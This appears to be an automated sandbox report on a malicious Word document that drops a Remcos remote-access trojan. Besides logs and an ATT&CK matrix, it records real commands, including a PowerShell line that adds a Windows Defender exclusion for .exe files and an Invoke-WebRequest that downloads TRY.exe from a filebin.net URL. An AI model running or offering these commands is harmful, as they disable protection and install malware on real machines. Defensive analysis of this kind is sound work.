Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\msiexec.exe TID: 2400	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep count: 3633 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep count: 5106 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076	Thread sleep count: 2122 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112	Thread sleep count: 3302 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5208	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3633	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5106	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2122	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3302	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_12-2416

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC45E4C GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,GetLastError,

12_2_00007FF6BAC45E4C

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC41F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

12_2_00007FF6BAC41F00

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,

12_2_00007FF6BAC42E28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC47F40 SetUnhandledExceptionFilter,		12_2_00007FF6BAC47F40
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC47C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		12_2_00007FF6BAC47C44

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC412C0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

12_2_00007FF6BAC412C0

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC48114 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

12_2_00007FF6BAC48114

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC429E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,

12_2_00007FF6BAC429E4

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	21 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	21 Scripting	OS Credential Dumping	1 System Time Discovery	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 DLL Side-Loading	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	3 Exploitation for Client Execution	1 Services File Permissions Weakness	11 Process Injection	1 File Deletion	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	21 Masquerading	NTDS	17 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Services File Permissions Weakness	21 Virtualization/Sandbox Evasion	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
12543_0008858249_FWDOUTSTANDING_20200604.doc	38%	Virustotal		Browse
